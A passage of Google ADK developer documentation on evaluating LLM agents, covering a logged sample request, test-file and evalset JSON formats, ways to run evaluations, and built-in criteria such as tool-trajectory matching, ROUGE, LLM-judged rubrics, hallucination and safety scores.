should never pass in a string. You should not check prime numbers before calling the tool. When you are asked to roll a die and check prime numbers, you should always make the following two function calls: 1. You should first call the roll_die tool to get a roll. Wait for the function response before calling the check_prime tool. 2. After you get the function response from roll_die tool, you should call the check_prime tool with the roll_die result. 2.1 If user asks you to check primes based on previous rolls, make sure you include the previous rolls in the list. 3. When you respond, you must include the roll_die result from step 1. You should always perform the previous 3 steps when asking for a roll and checking prime numbers. You should not rely on the previous history on prime results. You are an agent. Your internal name is "hello_world_agent". The description about you is "hello world agent that can roll a dice of 8 sides and check prime numbers." ----------------------------------------------------------- Contents: {"parts":[{"text":"Roll a 6 sided dice"}],"role":"user"} {"parts":[{"function_call":{"args":{"sides":6},"name":"roll_die"}}],"role":"model"} {"parts":[{"function_response":{"name":"roll_die","response":{"result":2}}}],"role":"user"} ----------------------------------------------------------- Functions: roll_die: {'sides': {'type': }} check_prime: {'nums': {'items': {'type': }, 'type': }} ----------------------------------------------------------- 2025-07-10 15:26:13,779 - INFO - google_genai.models - AFC is enabled with max remote calls: 10. 2025-07-10 15:26:14,309 - INFO - google_adk.google.adk.models.google_llm - LLM Response: ----------------------------------------------------------- Text: I have rolled a 6 sided die, and the result is 2. ... ``` 1. **Analyze the Prompt:** By examining the `System Instruction`, `contents`, `functions` sections of the logged request, you can verify: - Is the system instruction correct? - Is the conversation history (`user` and `model` turns) accurate? - Is the most recent user query included? - Are the correct tools being provided to the model? - Are the tools correctly called by the model? - How long it takes for the model to respond? This detailed output allows you to diagnose a wide range of issues, from incorrect prompt engineering to problems with tool definitions, directly from the log files. # Why Evaluate Agents Supported in ADKPython In traditional software development, unit tests and integration tests provide confidence that code functions as expected and remains stable through changes. These tests provide a clear "pass/fail" signal, guiding further development. However, LLM agents introduce a level of variability that makes traditional testing approaches insufficient. Due to the probabilistic nature of models, deterministic "pass/fail" assertions are often unsuitable for evaluating agent performance. Instead, we need qualitative evaluations of both the final output and the agent's trajectory - the sequence of steps taken to reach the solution. This involves assessing the quality of the agent's decisions, its reasoning process, and the final result. This may seem like a lot of extra work to set up, but the investment of automating evaluations pays off quickly. If you intend to progress beyond prototype, this is a highly recommended best practice. ## Preparing for Agent Evaluations Before automating agent evaluations, define clear objectives and success criteria: - **Define Success:** What constitutes a successful outcome for your agent? - **Identify Critical Tasks:** What are the essential tasks your agent must accomplish? - **Choose Relevant Metrics:** What metrics will you track to measure performance? These considerations will guide the creation of evaluation scenarios and enable effective monitoring of agent behavior in real-world deployments. ## What to Evaluate? To bridge the gap between a proof-of-concept and a production-ready AI agent, a robust and automated evaluation framework is essential. Unlike evaluating generative models, where the focus is primarily on the final output, agent evaluation requires a deeper understanding of the decision-making process. Agent evaluation can be broken down into two components: 1. **Evaluating Trajectory and Tool Use:** Analyzing the steps an agent takes to reach a solution, including its choice of tools, strategies, and the efficiency of its approach. 1. **Evaluating the Final Response:** Assessing the quality, relevance, and correctness of the agent's final output. The trajectory is just a list of steps the agent took before it returned to the user. We can compare that against the list of steps we expect the agent to have taken. ### Evaluating trajectory and tool use Before responding to a user, an agent typically performs a series of actions, which we refer to as a 'trajectory.' It might compare the user input with session history to disambiguate a term, or lookup a policy document, search a knowledge base or invoke an API to save a ticket. We call this a ‘trajectory’ of actions. Evaluating an agent's performance requires comparing its actual trajectory to an expected, or ideal, one. This comparison can reveal errors and inefficiencies in the agent's process. The expected trajectory represents the ground truth -- the list of steps we anticipate the agent should take. For example: ```python # Trajectory evaluation will compare expected_steps = ["determine_intent", "use_tool", "review_results", "report_generation"] actual_steps = ["determine_intent", "use_tool", "review_results", "report_generation"] ``` ADK provides both groundtruth based and rubric based tool use evaluation metrics. To select the appropriate metric for your agent's specific requirements and goals, please refer to our [recommendations](#recommendations-on-criteria). ## How Evaluation works with the ADK The ADK offers two methods for evaluating agent performance against predefined datasets and evaluation criteria. While conceptually similar, they differ in the amount of data they can process, which typically dictates the appropriate use case for each. ### First approach: Using a test file This approach involves creating individual test files, each representing a single, simple agent-model interaction (a session). It's most effective during active agent development, serving as a form of unit testing. These tests are designed for rapid execution and should focus on simple session complexity. Each test file contains a single session, which may consist of multiple turns. A turn represents a single interaction between the user and the agent. Each turn includes - `User Content`: The user issued query. - `Expected Intermediate Tool Use Trajectory`: The tool calls we expect the agent to make in order to respond correctly to the user query. - `Expected Intermediate Agent Responses`: These are the natural language responses that the agent (or sub-agents) generates as it moves towards generating a final answer. These natural language responses are usually an artifact of an multi-agent system, where your root agent depends on sub-agents to achieve a goal. These intermediate responses, may or may not be of interest to the end user, but for a developer/owner of the system, are of critical importance, as they give you the confidence that the agent went through the right path to generate final response. - `Final Response`: The expected final response from the agent. You can give the file any name for example `evaluation.test.json`. The framework only checks for the `.test.json` suffix, and the preceding part of the filename is not constrained. The test files are backed by a formal Pydantic data model. The two key schema files are [Eval Set](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) and [Eval Case](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_case.py). Here is a test file with a few examples: *(Note: Comments are included for explanatory purposes and should be removed for the JSON to be valid.)* ```json # Do note that some fields are removed for sake of making this doc readable. { "eval_set_id": "home_automation_agent_light_on_off_set", "name": "", "description": "This is an eval set that is used for unit testing `x` behavior of the Agent", "eval_cases": [ { "eval_id": "eval_case_id", "conversation": [ { "invocation_id": "b7982664-0ab6-47cc-ab13-326656afdf75", # Unique identifier for the invocation. "user_content": { # Content provided by the user in this invocation. This is the query. "parts": [ { "text": "Turn off device_2 in the Bedroom." } ], "role": "user" }, "final_response": { # Final response from the agent that acts as a reference of benchmark. "parts": [ { "text": "I have set the device_2 status to off." } ], "role": "model" }, "intermediate_data": { "tool_uses": [ # Tool use trajectory in chronological order. { "args": { "location": "Bedroom", "device_id": "device_2", "status": "OFF" }, "name": "set_device_info" } ], "intermediate_responses": [] # Any intermediate sub-agent responses. } } ], "session_input": { # Initial session input. "app_name": "home_automation_agent", "user_id": "test_user", "state": {} } } ] } ``` Test files can be organized into folders. Optionally, a folder can also include a `test_config.json` file that specifies the evaluation criteria. #### How to migrate test files not backed by the Pydantic schema? NOTE: If your test files don't adhere to [EvalSet](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) schema file, then this section is relevant to you. Please use `AgentEvaluator.migrate_eval_data_to_new_schema` to migrate your existing `*.test.json` files to the Pydantic backed schema. The utility takes your current test data file and an optional initial session file, and generates a single output json file with data serialized in the new format. Given that the new schema is more cohesive, both the old test data file and initial session file can be ignored (or removed.) ### Second approach: Using An Evalset File The evalset approach utilizes a dedicated dataset called an "evalset" for evaluating agent-model interactions. Similar to a test file, the evalset contains example interactions. However, an evalset can contain multiple, potentially lengthy sessions, making it ideal for simulating complex, multi-turn conversations. Due to its ability to represent complex sessions, the evalset is well-suited for integration tests. These tests are typically run less frequently than unit tests due to their more extensive nature. An evalset file contains multiple "evals," each representing a distinct session. Each eval consists of one or more "turns," which include the user query, expected tool use, expected intermediate agent responses, and a reference response. These fields have the same meaning as they do in the test file approach. Alternatively, an eval can define a *conversation scenario* which is used to [dynamically simulate](https://google.github.io/adk-docs/evaluate/user-sim/index.md) a user interaction with the agent. Each eval is identified by a unique name. Furthermore, each eval includes an associated initial session state. Creating evalsets manually can be complex, therefore UI tools are provided to help capture relevant sessions and easily convert them into evals within your evalset. Learn more about using the web UI for evaluation below. Here is an example evalset containing two sessions. The eval set files are backed by a formal Pydantic data model. The two key schema files are [Eval Set](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) and [Eval Case](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_case.py). Warning This evalset evaluation method requires the use of a paid service, [Vertex Gen AI Evaluation Service API](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/evaluation). *(Note: Comments are included for explanatory purposes and should be removed for the JSON to be valid.)* ```json # Do note that some fields are removed for sake of making this doc readable. { "eval_set_id": "eval_set_example_with_multiple_sessions", "name": "Eval set with multiple sessions", "description": "This eval set is an example that shows that an eval set can have more than one session.", "eval_cases": [ { "eval_id": "session_01", "conversation": [ { "invocation_id": "e-0067f6c4-ac27-4f24-81d7-3ab994c28768", "user_content": { "parts": [ { "text": "What can you do?" } ], "role": "user" }, "final_response": { "parts": [ { "text": "I can roll dice of different sizes and check if numbers are prime." } ], "role": null }, "intermediate_data": { "tool_uses": [], "intermediate_responses": [] } } ], "session_input": { "app_name": "hello_world", "user_id": "user", "state": {} } }, { "eval_id": "session_02", "conversation": [ { "invocation_id": "e-92d34c6d-0a1b-452a-ba90-33af2838647a", "user_content": { "parts": [ { "text": "Roll a 19 sided dice" } ], "role": "user" }, "final_response": { "parts": [ { "text": "I rolled a 17." } ], "role": null }, "intermediate_data": { "tool_uses": [], "intermediate_responses": [] } }, { "invocation_id": "e-bf8549a1-2a61-4ecc-a4ee-4efbbf25a8ea", "user_content": { "parts": [ { "text": "Roll a 10 sided dice twice and then check if 9 is a prime or not" } ], "role": "user" }, "final_response": { "parts": [ { "text": "I got 4 and 7 from the dice roll, and 9 is not a prime number.\n" } ], "role": null }, "intermediate_data": { "tool_uses": [ { "id": "adk-1a3f5a01-1782-4530-949f-07cf53fc6f05", "args": { "sides": 10 }, "name": "roll_die" }, { "id": "adk-52fc3269-caaf-41c3-833d-511e454c7058", "args": { "sides": 10 }, "name": "roll_die" }, { "id": "adk-5274768e-9ec5-4915-b6cf-f5d7f0387056", "args": { "nums": [ 9 ] }, "name": "check_prime" } ], "intermediate_responses": [ [ "data_processing_agent", [ { "text": "I have rolled a 10 sided die twice. The first roll is 5 and the second roll is 3.\n" } ] ] ] } } ], "session_input": { "app_name": "hello_world", "user_id": "user", "state": {} } } ] } ``` #### How to migrate eval set files not backed by the Pydantic schema? NOTE: If your eval set files don't adhere to [EvalSet](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) schema file, then this section is relevant to you. Based on who is maintaining the eval set data, there are two routes: 1. **Eval set data maintained by ADK UI** If you use ADK UI to maintain your Eval set data then *no action is needed* from you. 1. **Eval set data is developed and maintained manually and used in ADK eval CLI** A migration tool is in the works, until then the ADK eval CLI command will continue to support data in the old format. ### Evaluation Criteria ADK provides several built-in criteria for evaluating agent performance, ranging from tool trajectory matching to LLM-based response quality assessment. For a detailed list of available criteria and guidance on when to use them, please see [Evaluation Criteria](https://google.github.io/adk-docs/evaluate/criteria/index.md). Here is a summary of all the available criteria: - **tool_trajectory_avg_score**: Exact match of tool call trajectory. - **response_match_score**: ROUGE-1 similarity to reference response. - **final_response_match_v2**: LLM-judged semantic match to a reference response. - **rubric_based_final_response_quality_v1**: LLM-judged final response quality based on custom rubrics. - **rubric_based_tool_use_quality_v1**: LLM-judged tool usage quality based on custom rubrics. - **hallucinations_v1**: LLM-judged groundedness of agent response against context. - **safety_v1**: Safety/harmlessness of agent response. If no evaluation criteria are provided, the following default configuration is used: - `tool_trajectory_avg_score`: Defaults to 1.0, requiring a 100% match in the tool usage trajectory. - `response_match_score`: Defaults to 0.8, allowing for a small margin of error in the agent's natural language responses. Here is an example of a `test_config.json` file specifying custom evaluation criteria: ```json { "criteria": { "tool_trajectory_avg_score": 1.0, "response_match_score": 0.8 } } ``` #### Recommendations on Criteria Choose criteria based on your evaluation goals: - **Enable tests in CI/CD pipelines or regression testing:** Use `tool_trajectory_avg_score` and `response_match_score`. These criteria are fast, predictable, and suitable for frequent automated checks. - **Evaluate trusted reference responses:** Use `final_response_match_v2` to evaluate semantic equivalence. This LLM-based check is more flexible than exact matching and better captures whether the agent's response means the same thing as the reference response. - **Evaluate response quality without a reference response:** Use `rubric_based_final_response_quality_v1`. This is useful when you don't have a trusted reference, but you can define attributes of a good response (e.g., "The response is concise," "The response has a helpful tone"). - **Evaluate the correctness of tool usage:** Use `rubric_based_tool_use_quality_v1`. This allows you to validate the agent's reasoning process by checking, for example, that a specific tool was called or that tools were called in the correct order (e.g., "Tool A must be called before Tool B"). - **Check if responses are grounded in context:** Use `hallucinations_v1` to detect if the agent makes claims that are unsupported by or contradictory to the information available to it (e.g., tool outputs). - **Check for harmful content:** Use `safety_v1` to ensure that agent responses are safe and do not violate safety policies. In addition, criteria which require information on expected agent tool use and/or responses are not supported in combination with [User Simulation](https://google.github.io/adk-docs/evaluate/user-sim/index.md). Currently, only the `hallucinations_v1` and `safety_v1` criteria support such evals. ### User Simulation When evaluating conversational agents, it is not always practical to use a fixed set of user prompts, as the conversation can proceed in unexpected ways. For example, if the agent needs the user to supply two values to perform a task, it may ask for those values one at a time or both at once. To resolve this issue, ADK allows you test the behavior of the agent in a specific *conversation scenario* with user prompts that are dynamically generated by an AI model. For details on how to set up an eval with user simulation, see [User Simulation](https://google.github.io/adk-docs/evaluate/user-sim/index.md). ## How to run Evaluation with the ADK As a developer, you can evaluate your agents using the ADK in the following ways: 1. **Web-based UI (**`adk web`**):** Evaluate agents interactively through a web-based interface. 1. **Programmatically (**`pytest`**)**: Integrate evaluation into your testing pipeline using `pytest` and test files. 1. **Command Line Interface (**`adk eval`**):** Run evaluations on an existing evaluation set file directly from the command line. ### 1. `adk web` - Run Evaluations via the Web UI The web UI provides an interactive way to evaluate agents, generate evaluation datasets, and inspect agent behavior in detail. #### Step 1: Create and Save a Test Case 1. Start the web server by running: `adk web ` 1. In the web interface, select an agent and interact with it to create a session. 1. Navigate to the **Eval** tab on the right side of the interface. 1. Create a new eval set or select an existing one. 1. Click **"Add current session"** to save the conversation as a new evaluation case. #### Step 2: View and Edit Your Test Case Once a case is saved, you can click its ID in the list to inspect it. To make changes, click the **Edit current eval case** icon (pencil). This interactive view allows you to: - **Modify** agent text responses to refine test scenarios. - **Delete** individual agent messages from the conversation. - **Delete** the entire evaluation case if it's no longer needed. #### Step 3: Run the Evaluation with Custom Metrics 1. Select one or more test cases from your evalset. 1. Click **Run Evaluation**. An **EVALUATION METRIC** dialog will appear. 1. In the dialog, use the sliders to configure the thresholds for: - **Tool trajectory avg score** - **Response match score** 1. Click **Start** to run the evaluation using your custom criteria. The evaluation history will record the metrics used for each run. #### Step 4: Analyze Results After the run completes, you can analyze the results: - **Analyze Run Failures**: Click on any **Pass** or **Fail** result. For failures, you can hover over the `Fail` label to see a side-by-side comparison of the **Actual vs. Expected Output** and the scores that caused the failure. ### Debugging with the Trace View The ADK web UI includes a powerful **Trace** tab for debugging agent behavior. This feature is available for any agent session, not just during evaluation. The **Trace** tab provides a detailed and interactive way to inspect your agent's execution flow. Traces are automatically grouped by user message, making it easy to follow the chain of events. Each trace row is interactive: - **Hovering** over a trace row highlights the corresponding message in the chat window. - **Clicking** on a trace row opens a detailed inspection panel with four tabs: - **Event**: The raw event data. - **Request**: The request sent to the model. - **Response**: The response received from the model. - **Graph**: A visual representation of the tool calls and agent logic flow. Blue rows in the trace view indicate that an event was generated from that interaction. Clicking on these blue rows will open the bottom event detail panel, providing deeper insights into the agent's execution flow. ### 2. `pytest` - Run Tests Programmatically You can also use **`pytest`** to run test files as part of your integration tests. #### Example Command ```shell pytest tests/integration/ ``` #### Example Test Code Here is an example of a `pytest` test case that runs a single test file: ```py from google.adk.evaluation.agent_evaluator import AgentEvaluator import pytest @pytest.mark.asyncio async def test_with_single_test_file(): """Test the agent's basic ability via a session file.""" await AgentEvaluator.evaluate( agent_module="home_automation_agent", eval_dataset_file_path_or_dir="tests/integration/fixture/home_automation_agent/simple_test.test.json", ) ``` This approach allows you to integrate agent evaluations into your CI/CD pipelines or larger test suites. If you want to specify the initial session state for your tests, you can do that by storing the session details in a file and passing that to `AgentEvaluator.evaluate` method. ### 3. `adk eval` - Run Evaluations via the CLI You can also run evaluation of an eval set file through the command line interface (CLI). This runs the same evaluation that runs on the UI, but it helps with automation, i.e. you can add this command as a part of your regular build generation and verification process. Here is the command: ```shell adk eval \ \ \ [--config_file_path=] \ [--print_detailed_results] ``` For example: ```shell adk eval \ samples_for_testing/hello_world \ samples_for_testing/hello_world/hello_world_eval_set_001.evalset.json ``` Here are the details for each command line argument: - `AGENT_MODULE_FILE_PATH`: The path to the `__init__.py` file that contains a module by the name "agent". "agent" module contains a `root_agent`. - `EVAL_SET_FILE_PATH`: The path to evaluations file(s). You can specify one or more eval set file paths. For each file, all evals will be run by default. If you want to run only specific evals from a eval set, first create a comma separated list of eval names and then add that as a suffix to the eval set file name, demarcated by a colon `:` . - For example: `sample_eval_set_file.json:eval_1,eval_2,eval_3`\ `This will only run eval_1, eval_2 and eval_3 from sample_eval_set_file.json` - `CONFIG_FILE_PATH`: The path to the config file. - `PRINT_DETAILED_RESULTS`: Prints detailed results on the console. # Evaluation Criteria Supported in ADKPython This page outlines the evaluation criteria provided by ADK to assess agent performance, including tool use trajectory, response quality, and safety. | Criterion | Description | Reference-Based | Requires Rubrics | LLM-as-a-Judge | Supports [User Simulation](https://google.github.io/adk-docs/evaluate/user-sim/index.md) | | ---------------------------------------- | --------------------------------------------------------- | --------------- | ---------------- | -------------- | ---------------------------------------------------------------------------------------- | | `tool_trajectory_avg_score` | Exact match of tool call trajectory | Yes | No | No | No | | `response_match_score` | ROUGE-1 similarity to reference response | Yes | No | No | No | | `final_response_match_v2` | LLM-judged semantic match to reference response | Yes | No | Yes | No | | `rubric_based_final_response_quality_v1` | LLM-judged final response quality based on custom rubrics | No | Yes | Yes | Yes | | `rubric_based_tool_use_quality_v1` | LLM-judged tool usage quality based on custom rubrics | No | Yes | Yes | Yes | | `hallucinations_v1` | LLM-judged groundedness of agent response against context | No | No | Yes | Yes | | `safety_v1` | Safety/harmlessness of agent response | No | No | Yes | Yes | | `per_turn_user_simulator_quality_v1` | LLM-judged user simulator quality | No | No | Yes | Yes | ## tool_trajectory_avg_score This criterion compares the sequence of tools called by the agent against a list of expected calls and computes an average score based on one of the match types: `EXACT`, `IN_ORDER`, or `ANY_ORDER`. #### When To Use This Criterion? This criterion is ideal for scenarios where agent correctness depends on tool calls. Depending on how strictly tool calls need to be followed, you can choose from one of three match types: `EXACT`, `IN_ORDER`, and `ANY_ORDER`. This metric is particularly valuable for: - **Regression testing:** Ensuring that agent updates do not unintentionally alter tool call behavior for established test cases. - **Workflow validation:** Verifying that agents correctly follow predefined workflows that require specific API calls in a specific order. - **High-precision tasks:** Evaluating tasks where slight deviations in tool parameters or call order can lead to significantly different or incorrect outcomes. Use `EXACT` match when you need to enforce a specific tool execution path and consider any deviation—whether in tool name, arguments, or order—as a failure. Use `IN_ORDER` match when you want to ensure certain key tool calls occur in a specific order, but allow for other tool calls to happen in between. This option is useful in assuring if certain key actions or tool calls occur and in certain order, leaving some scope for other tools calls to happen as well. Use `ANY_ORDER` match when you want to ensure certain key tool calls occur, but do not care about their order, and allow for other tool calls to happen in between. This criteria is helpful for cases where multiple tool calls about the same concept occur, like your agent issues 5 search queries. You don't really care the order in which the search queries are issued, till they occur. #### Details For each invocation that is being evaluated, this criterion compares the list of tool calls produced by the agent against the list of expected tool calls using one of three match types. If the tool calls match based on the selected match type, a score of 1.0 is awarded for that invocation, otherwise the score is 0.0. The final value is the average of these scores across all invocations in the eval case. The comparison can be done using one of following match types: - **`EXACT`**: Requires a perfect match between the actual and expected tool calls, with no extra or missing tool calls. - **`IN_ORDER`**: Requires all tool calls from the expected list to be present in the actual list, in the same order, but allows for other tool calls to appear in between. - **`ANY_ORDER`**: Requires all tool calls from the expected list to be present in the actual list, in any order, and allows for other tool calls to appear in between. #### How To Use This Criterion? By default, `tool_trajectory_avg_score` uses `EXACT` match type. You can specify just a threshold for this criterion in `EvalConfig` under the `criteria` dictionary for `EXACT` match type. The value should be a float between 0.0 and 1.0, which represents the minimum acceptable score for the eval case to pass. If you expect tool trajectories to match exactly in all invocations, you should set the threshold to 1.0. Example `EvalConfig` entry for `EXACT` match: ```json { "criteria": { "tool_trajectory_avg_score": 1.0 } } ``` Or you could specify the `match_type` explicitly: ```json { "criteria": { "tool_trajectory_avg_score": { "threshold": 1.0, "match_type": "EXACT" } } } ``` If you want to use `IN_ORDER` or `ANY_ORDER` match type, you can specify it via `match_type` field along with threshold. Example `EvalConfig` entry for `IN_ORDER` match: ```json { "criteria": { "tool_trajectory_avg_score": { "threshold": 1.0, "match_type": "IN_ORDER" } } } ``` Example `EvalConfig` entry for `ANY_ORDER` match: ```json { "criteria": { "tool_trajectory_avg_score": { "threshold": 1.0, "match_type": "ANY_ORDER" } } } ``` #### Output And How To Interpret The output is a score between 0.0 and 1.0, where 1.0 indicates a perfect match between actual and expected tool trajectories for all invocations, and 0.0 indicates a complete mismatch for all invocations. Higher scores are better. A score below 1.0 means that for at least one invocation, the agent's tool call trajectory deviated from the expected one. ## response_match_score This criterion evaluates if agent's final response matches a golden/expected final response using Rouge-1. ### When To Use This Criterion? Use this criterion when you need a quantitative measure of how closely the agent's output matches the expected output in terms of content overlap. ### Details ROUGE-1 specifically measures the overlap of unigrams (single words) between the system-generated text (candidate summary) and the a reference text. It essentially checks how many individual words from the reference text are present in the candidate text. To learn more, see details on [ROUGE-1](https://github.com/google-research/google-research/tree/master/rouge). ### How To Use This Criterion? You can specify a threshold for this criterion in `EvalConfig` under the `criteria` dictionary. The value should be a float between 0.0 and 1.0, which represents the minimum acceptable score for the eval case to pass. Example `EvalConfig` entry: ```json { "criteria": { "response_match_score": 0.8 } } ``` ### Output And How To Interpret Value range for this criterion is [0,1], with values closer to 1 more desirable. ## final_response_match_v2 This criterion evaluates if the agent's final response matches a golden/expected final response using LLM as a judge. ### When To Use This Criterion? Use this criterion when you need to evaluate the correctness of an agent's final response against a reference, but require flexibility in how the answer is presented. It is suitable for cases where different phrasings or formats are acceptable, as long as the core meaning and information match the reference. This criterion is a good choice for evaluating question-answering, summarization, or other generative tasks where semantic equivalence is more important than exact lexical overlap, making it a more sophisticated alternative to `response_match_score`. ### Details This criterion uses a Large Language Model (LLM) as a judge to determine if the agent's final response is semantically equivalent to the provided reference response. It is designed to be more flexible than lexical matching metrics (like `response_match_score`), as it focuses on whether the agent's response contains the correct information, while tolerating differences in formatting, phrasing, or the inclusion of additional correct details. For each invocation, the criterion prompts a judge LLM to rate the agent's response as "valid" or "invalid" compared to the reference. This is repeated multiple times for robustness (configurable via `num_samples`), and a majority vote determines if the invocation receives a score of 1.0 (valid) or 0.0 (invalid). The final criterion score is the fraction of invocations deemed valid across the entire eval case. ### How To Use This Criterion? This criterion uses `LlmAsAJudgeCriterion`, allowing you to configure the evaluation threshold, the judge model, and the number of samples per invocation. Example `EvalConfig` entry: ```json { "criteria": { "final_response_match_v2": { "threshold": 0.8, "judge_model_options": { "judge_model": "gemini-2.5-flash", "num_samples": 5 } } } } } ``` ### Output And How To Interpret The criterion returns a score between 0.0 and 1.0. A score of 1.0 means the LLM judge considered the agent's final response to be valid for all invocations, while a score closer to 0.0 indicates that many responses were judged as invalid when compared to the reference responses. Higher values are better. ## rubric_based_final_response_quality_v1 This criterion assesses the quality of an agent's final response against a user-defined set of rubrics using LLM as a judge. ### When To Use This Criterion? Use this criterion when you need to evaluate aspects of response quality that go beyond simple correctness or semantic equivalence with a reference. It is ideal for assessing nuanced attributes like tone, style, helpfulness, or adherence to specific conversational guidelines defined in your rubrics. This criterion is particularly useful when no single reference response exists, or when quality depends on multiple subjective factors. ### Details This criterion provides a flexible way to evaluate response quality based on specific criteria that you define as rubrics. For example, you could define rubrics to check if a response is concise, if it correctly infers user intent, or if it avoids jargon. The criterion uses an LLM-as-a-judge to evaluate the agent's final response against each rubric, producing a `yes` (1.0) or `no` (0.0) verdict for each. Like other LLM-based metrics, it samples the judge model multiple times per invocation and uses a majority vote to determine the score for each rubric in that invocation. The overall score for an invocation is the average of its rubric scores. The final criterion score for the eval case is the average of these overall scores across all invocations. ### How To Use This Criterion? This criterion uses `RubricsBasedCriterion`, which requires a list of rubrics to be provided in the `EvalConfig`. Each rubric should be defined with a unique ID and its content. Example `EvalConfig` entry: ```json { "criteria": { "rubric_based_final_response_quality_v1": { "threshold": 0.8, "judge_model_options": { "judge_model": "gemini-2.5-flash", "num_samples": 5 }, "rubrics": [ { "rubric_id": "conciseness", "rubric_content": { "text_property": "The agent's response is direct and to the point." } }, { "rubric_id": "intent_inference", "rubric_content": { "text_property": "The agent's response accurately infers the user's underlying goal from ambiguous queries." } } ] } } } ``` ### Output And How To Interpret The criterion outputs an overall score between 0.0 and 1.0, where 1.0 indicates that the agent's responses satisfied all rubrics across all invocations, and 0.0 indicates that no rubrics were satisfied. The results also include detailed per-rubric scores for each invocation. Higher values are better. ## rubric_based_tool_use_quality_v1 This criterion assesses the quality of an agent's tool usage against a user-defined set of rubrics using LLM as a judge. ### When To Use This Criterion? Use this criterion when you need to evaluate *how* an agent uses tools, rather than just *if* the final response is correct. It is ideal for assessing whether the agent selected the right tool, used the correct parameters, or followed a specific sequence of tool calls. This is useful for validating agent reasoning processes, debugging tool-use errors, and ensuring adherence to prescribed workflows, especially in cases where multiple tool-use paths could lead to a similar final answer but only one path is considered correct. ### Details This criterion provides a flexible way to evaluate tool usage based on specific rules that you define as rubrics. For example, you could define rubrics to check if a specific tool was called, if its parameters were correct, or if tools were called in a particular order. The criterion uses an LLM-as-a-judge to evaluate the agent's tool calls and responses against each rubric, producing a `yes` (1.0) or `no` (0.0) verdict for each. Like other LLM-based metrics, it samples the judge model multiple times per invocation and uses a majority vote to determine the score for each rubric in that invocation. The overall score for an invocation is the average of its rubric scores. The final criterion score for the eval case is the average of these overall scores across all invocations. ### How To Use This Criterion? This criterion uses `RubricsBasedCriterion`, which requires a list of rubrics to be provided in the `EvalConfig`. Each rubric should be defined with a unique ID and its content, describing a specific aspect of tool use to evaluate. Example `EvalConfig` entry: ```json { "criteria": { "rubric_based_tool_use_quality_v1": { "threshold": 1.0, "judge_model_options": { "judge_model": "gemini-2.5-flash", "num_samples": 5 }, "rubrics": [ { "rubric_id": "geocoding_called", "rubric_content": { "text_property": "The agent calls the GeoCoding tool before calling the GetWeather tool." } }, { "rubric_id": "getweather_called", "rubric_content": { "text_property": "The agent calls the GetWeather tool with coordinates derived from the user's location." } } ] } } } ``` ### Output And How To Interpret The criterion outputs an overall score between 0.0 and 1.0, where 1.0 indicates that the agent's tool usage satisfied all rubrics across all invocations, and 0.0 indicates that no rubrics were satisfied. The results also include detailed per-rubric scores for each invocation. Higher values are better. ## hallucinations_v1 This criterion assesses whether a model response contains any false, contradictory, or unsupported claims. ### When To Use This Criterion? Use this criterion to ensure the agent's response is grounded in the provided context (e.g., tool outputs, user query, instructions) and does not contain hallucinations. ### Details This criterion assesses whether a model response contains any false, contradictory, or unsupported claims based on context that includes developer instructions, user prompt, tool definitions, and tool invocations and their results. It uses LLM-as-a-judge and follows a two-step process: 1. **Segmenter**: Segments the agent response into individual sentences. 1. **Sentence Validator**: Evaluates each segmented sentence against the provided context for grounding. Each sentence is labeled as `supported`, `unsupported`, `contradictory`, `disputed` or `not_applicable`. The metric computes an Accuracy Score: the percentage of sentences that are `supported` or `not_applicable`. By default, only the final response is evaluated. If `evaluate_intermediate_nl_responses` is set to true in the criterion, intermediate natural language responses from agents are also evaluated. ### How To Use This Criterion? This criterion uses `HallucinationsCriterion`, allowing you to configure the evaluation threshold, the judge model, the number of samples per invocation and whether to evaluate intermediate natural language responses. Example `EvalConfig` entry: ```json { "criteria": { "hallucinations_v1": { "threshold": 0.8, "judge_model_options": { "judge_model": "gemini-2.5-flash", }, "evaluate_intermediate_nl_responses": true } } } ``` ### Output And How To Interpret The criterion returns a score between 0.0 and 1.0. A score of 1.0 means all sentences in agent's response are grounded in the context, while a score closer to 0.0 indicates that many sentences are false, contradictory, or unsupported. Higher values are better. ## safety_v1 This criterion evaluates the safety (harmlessness) of an Agent's Response. ### When To Use This Criterion? This criterion should be used when you need to ensure that agent responses comply with safety guidelines and do not produce harmful or inappropriate content. It is essential for user-facing applications or any system where response safety is a priority. ### Details This criterion assesses whether the agent's response contains any harmful content, such as hate speech, harassment, or dangerous information. Unlike other metrics implemented natively within ADK, `safety_v1` delegates the evaluation to the Vertex AI General AI Eval SDK. ### How To Use This Criterion? Using this criterion requires a Google Cloud Project. You must have `GOOGLE_CLOUD_PROJECT` and `GOOGLE_CLOUD_LOCATION` environment variables set, typically in an `.env` file in your agent's directory, for the Vertex AI SDK to function correctly. You can specify a threshold for this criterion in `EvalConfig` under the `criteria` dictionary. The value should be a float between 0.0 and 1.0, representing the minimum safety score for a response to be considered passing. Example `EvalConfig` entry: ```json { "criteria": { "safety_v1": 0.8 } } ``` ### Output And How To Interpret The criterion returns a score between 0.0 and 1.0. Scores closer to 1.0 indicate that the response is safe, while scores closer to 0.0 indicate potential safety issues. ## per_turn_user_simulator_quality_v1 This criterion evaluates whether a user simulator is faithful to a conversation plan. #### When To Use This Criterion? Use this criterion when you need to evaluate a user simulator in a multi-turn conversation. It is designed to assess whether the simulator follows the conversation plan defined in the `ConversationScenario`. #### Details This criterion determines whether the a user simulator follows a defined `ConversationScenario` in a multi-turn conversation. For the first turn, this criterion checks if user simulator response matches the `starting_prompt` in the `ConversationScenario`. For subsequent turns, it uses LLM-as-a-judge to evaluate if the user response follows the `conversation_plan` in the `ConversationScenario`. #### How To Use This Criterion? This criterion allows you to configure the evaluation threshold, the judge model and the number of samples per invocation. The criterion also lets you specify a `stop_signal`, which signals the LLM judge that the conversation was completed. For best results, use the stop signal in `LlmBackedUserSimulator`. Example `EvalConfig` entry: ```json { "criteria": { "per_turn_user_simulator_quality_v1": { "threshold": 1.0, "judge_model_options": { "judge_model": "gemini-2.5-flash", "num_samples": 5 }, "stop_signal": "" } } } ``` #### Output And How To Interpret The criterion returns a score between 0.0 and 1.0, representing the fraction of turns in which the user simulator's response was judged to be valid according to the conversation scenario. A score of 1.0 indicates that the simulator behaved as expected in all turns, while a score closer to 0.0 indicates that the simulator deviated in many turns. Higher values are better. # User Simulation Supported in 